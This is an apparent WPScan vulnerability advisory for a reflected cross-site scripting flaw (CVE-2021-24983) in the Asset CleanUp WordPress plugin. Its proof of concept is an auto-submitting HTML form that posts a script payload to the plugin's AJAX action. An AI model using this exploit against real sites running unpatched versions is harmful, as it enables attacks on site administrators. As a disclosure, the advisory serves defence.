WordPress Plugin Vulnerabilities

Asset CleanUp < 1.3.8.5 - Reflected Cross-Site Scripting via AJAX Action

Description

The plugin does not sanitise and escape POSted parameters sent to the wpassetcleanup_fetch_active_plugins_icons AJAX action (available to admin users), leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="wpassetcleanup_fetch_active_plugins_icons" />
      <input type="hidden" name="xxx" value="<script>alert(/XSS/)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Plugin icon
wp-asset-clean-up
Fixed in 1.3.8.5

References

CVE
CVE-2021-24983

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.5 (high)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
31fdabb0-bc74-4d25-b0cd-c872aae6cb2f

Timeline

Publicly Published
2022-01-03 (about 2 years ago)
Added
2022-01-03 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2021-01-06
Title
Elementor < 3.0.14 - SVG Upload Allowed by Default
Published
2023-11-09
Title
Qi Addons For Elementor < 1.6.5 - Contributor+ Stored XSS
Published
2023-03-21
Title
Userlike – WordPress Live Chat < 2.3 - Admin+ Stored Cross-Site Scripting
Published
2024-05-02
Title
Simple Image Popup <= 2.4.0 - Authenticated (Admin+) Stored Cross-Site Scripting
Published
2021-09-09
Title
WordPress Simple Shop <= 1.2 - Reflected Cross-Site Scripting